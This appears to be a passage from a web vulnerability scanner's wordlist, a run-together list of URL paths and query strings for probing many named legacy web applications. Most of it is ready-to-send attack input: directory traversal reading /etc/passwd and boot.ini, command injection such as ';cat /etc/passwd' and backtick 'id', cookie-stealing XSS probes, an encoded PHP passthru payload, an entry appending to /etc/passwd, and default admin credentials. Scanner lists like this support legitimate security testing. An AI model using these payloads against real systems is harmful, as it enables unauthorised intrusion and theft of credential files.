sysuser/docmgr/htaccess.stm?path= sysuser/docmgr/iecreate.stm?path= sysuser/docmgr/iecreate.stm?template=../ sysuser/docmgr/ieedit.stm?name= sysuser/docmgr/ieedit.stm?path= sysuser/docmgr/ieedit.stm?url=../ sysuser/docmgr/info.stm?name= sysuser/docmgr/info.stm?path= sysuser/docmgr/mkdir.stm?path= sysuser/docmgr/rename.stm?name= sysuser/docmgr/rename.stm?path= sysuser/docmgr/search.stm?path= sysuser/docmgr/search.stm?query= sysuser/docmgr/sendmail.stm?name= sysuser/docmgr/sendmail.stm?path= sysuser/docmgr/template.stm?path= sysuser/docmgr/update.stm?name= sysuser/docmgr/update.stm?path= sysuser/docmgr/vccheckin.stm?name= sysuser/docmgr/vccheckin.stm?path= sysuser/docmgr/vccreate.stm?name= sysuser/docmgr/vccreate.stm?path= sysuser/docmgr/vchist.stm?name= sysuser/docmgr/vchist.stm?path= tablebuild.pl talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 tar/ tarjetas/ tcb/files/auth/r/root tcsh technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../etc/passwd technote/print.cgi temp/ template/ templates/form_header.php?noticemsg= temporal/ test test-cgi.bat test-cgi.exe? test-cgi.tcl test-cgi?/* test-env test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ test.cgi test.htm test.html test.nsf test.php test.php%20 test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x test.txt test/ test/info.php test/jsp/Language.jsp test/jsp/buffer1.jsp test/jsp/buffer2.jsp test/jsp/buffer3.jsp test/jsp/buffer4.jsp test/jsp/declaration/IntegerOverflow.jsp test/jsp/extends1.jsp test/jsp/extends2.jsp test/jsp/pageAutoFlush.jsp test/jsp/pageDouble.jsp test/jsp/pageExtends.jsp test/jsp/pageImport2.jsp test/jsp/pageInfo.jsp test/jsp/pageInvalid.jsp test/jsp/pageIsErrorPage.jsp test/jsp/pageIsThreadSafe.jsp test/jsp/pageSession.jsp test/phpinfo.php test/realPath.jsp test/test.cgi testcgi.exe testcgi.exe? testing/ tests/ texis.exe/?-dump texis.exe/?-version texis.exe/junk texis/junk texis/phine texis/websearch/phine textcounter.pl thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\">,/system/status/session theme1/selector?button=status,monitor,session&button_url=/system/status/status\">,/system/status/moniter,/system/status/session theme1/selector?button=status,monitor,session\">&button_url=/system/status/status,/system/status/moniter,/system/status/session themes/mambosimple.php?detection=detected&sitename= ticket.php?id=99999 tidfinder.cgi tigvote.cgi tinymsg.php title.cgi tmp/ tmp_view.php?file=/etc/passwd today.nsf tomcat-docs/index.html tools/ topic/entete.php topsitesdir/edit.php tpgnrock tpv/ trabajo/ trace.axd traffic.cgi?cfg=../../../../../../../../etc/passwd trafficlog/ transito/ tree tree/ trees/ troops.cgi tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\, tsweb/ ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd ttawebtop.cgi/?action=start&pg=../../../../../../../../../../passwd ttforum/index.php ttp://127.0.0.1:2301/ tutos/file/file_new.php tutos/file/file_select.php tvcs/getservers.exe?action=selects1 typo3/typo3/dev/translations.php typo3conf/ typo3conf/database.sql typo3conf/localconf.php uifc/MultFileUploadHandler.php+ ultraboard.cgi ultraboard.pl unlg1.1 unlg1.2 upd/ update.dpgs updates/ upload.asp upload.cgi upload.cgi+ upload.php?type=\" uploader.php uploadn.asp uploadx.asp uptime url.jsp urlcount.cgi?%3CIMG%20 urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini usage/ user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com user.php?op=userinfo&uname= user/ useraction.php3 usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27) userinfo.php?uid=1; userlog.php userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0acat</var/spool/mail/login>>/etc/passwd userreg.nsf users.lst users.nsf users.php?mode=profile&uid=<script>alert(document.cookie)</script> users/ users/scripts/submit.cgi ustats/ ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd usuario/ usuarios/ utils/sprc.asp utils/sprc.asp+ utm/admin utm/utm_stat vars.inc+ vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22 vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22 vc30/ vchat/msg.txt vfs/ vgn/ac/data vgn/ac/delete vgn/ac/edit vgn/ac/esave vgn/ac/fsave vgn/ac/index vgn/asp/MetaDataUpdate vgn/asp/previewer vgn/asp/status vgn/asp/style vgn/errors vgn/jsp/controller vgn/jsp/errorpage vgn/jsp/initialize vgn/jsp/jspstatus vgn/jsp/jspstatus56 vgn/jsp/metadataupdate vgn/jsp/previewer vgn/jsp/style vgn/legacy/edit vgn/legacy/save vgn/license vgn/login vgn/login/1,501,,00.html?cookieName=x--\> vgn/performance/TMT vgn/performance/TMT/Report vgn/performance/TMT/Report/XML vgn/performance/TMT/reset vgn/ppstats vgn/previewer vgn/record/previewer vgn/style vgn/stylepreviewer vgn/vr/Deleting vgn/vr/Editing vgn/vr/Saving vgn/vr/Select vider.php3 view-source view-source?view-source view_item?HTML_FILE=../../../../../../../../../../etc view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00 view_source.jsp viewcvs.cgi/viewcvs/?cvsroot= viewcvs.cgi/viewcvs/?cvsroot= viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\ viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1 viewlogs.pl viewpage.php?file=/etc/passwd viewsource?/etc/passwd viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 viralator.cgi virgil.cgi visadmin.exe visitor.exe vote.cgi vpasswd.cgi vpuserinfo.nsf vq/demos/respond.pl? vq/demos/respond.pl? w-agora/ w3-msql w3-sql w3perl/admin wa.exe wais.pl warez/ way-board.cgi?db=/etc/passwd%00 way-board/way-board.cgi?db=/etc/passwd%00 wbboard/profile.php wbboard/reply.php wconsole.dll web-console/ServerInfo.jsp%00 web.config web.nsf web/ web800fo/ webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif web_app/WEB-INF/webapp.properties webaccess.htm webaccess/access-options.txt webadmin.nsf webadmin/ webais webalizer/ webamil/test.php webamil/test.php?mode=phpinfo webapp/admin/_pages/_bc4jadmin/ webbbs.cgi webbbs.exe webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd webboard/ webcache/ webcache/webcache.xml webcalendar/colors.php?color= webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd webcalendar/login.php webcalendar/view_m.php webcalendar/week.php?eventinfo= webcalendar/week.php?user=\"> webcart-lite/ webcart-lite/config/import.txt webcart-lite/orders/import.txt webcart/ webcart/carts/ webcart/config/ webcart/config/clients.txt webcart/orders/ webcart/orders/import.txt webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD webchat/register.php?register=yes&username=OverG&email=&email1= webdata/ webdav/index.html webdist.cgi?distloc=;cat%20/etc/passwd webdriver webfind.exe?keywords=01234567890123456789 webgais webif.cgi weblog/ weblogic weblogs/ webmail/ webmail/blank.html webmail/horde/test.php webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../.. webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 webmail/lib/emailreader_execute_on_each_page.inc.php webmail/src/read_body.php webmap.cgi webmaster_logs/ webnews.pl webplus.exe?about webplus?about webplus?script=../../../../../../../../../../etc webplus?script=../../../../../../../../../../etc/passwd websendmail website/ webspirs.cgi?sp.nextform=../../../../../../../../../../etc webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd webstats/ webtools/bonsai/cvsblame.cgi?file= webtools/bonsai/cvslog.cgi?file=*&rev=&root= webtools/bonsai/cvslog.cgi?file= webtools/bonsai/cvsquery.cgi?branch=&file=&date= webtools/bonsai/cvsquery.cgi?module=&branch=&dir=&file=&who=&sortby=Date&hours=2&date=week webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=&branch=HEAD webtools/bonsai/showcheckins.cgi?person= webtop/wdk/ webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef webtop/wdk/samples/index.jsp webuser.nsf webutil.pl webutils.pl webwho.pl welcome.nsf wguest.exe whatever.htr whateverJUNK(4).html where.pl?sd=ls%20/etc whois.cgi?action=load&whois=%3Bid whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd whois_raw.cgi?fqdn=%0Acat%20/etc/passwd wikihome/action/conflict.php windmail windmail.exe windows/ wksinst.nsf word/ work/ wrap wrap.cgi ws_ftp.ini wstats/ wusage/ www-sql www-sql/ www/ wwwadmin.pl wwwboard.cgi.cgi wwwboard.pl wwwboard/passwd.txt wwwboard/wwwboard.cgi wwwboard/wwwboard.pl wwwjoin/ wwwlog/ wwwping/index.stm?wwwsite= wwwstats.html wwwstats.pl wwwstats/ wwwthreads/3tvars.pm wwwthreads/w3tvars.pm wwwwais wx/s.dll?d=/boot.ini x_stat_admin.php xdk/ xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS yabbse/Reminder.php yabbse/Sources/Packages.php z_user_show.php?method=showuserlink&class=&rollid=admin&x=3da59a9da8825& zentrack/index.php zipfiles/ zml.cgi?file=../../../../../../../../../../etc zml.cgi?file=../../../../../../../../../../etc/passwd%00 zorum/index.php?method=<script>alert('Vulnerable')</script> zsh ~/.asp ~/.aspx ~/.aspx?aspxerrorpath=null ~nobody/etc/passwd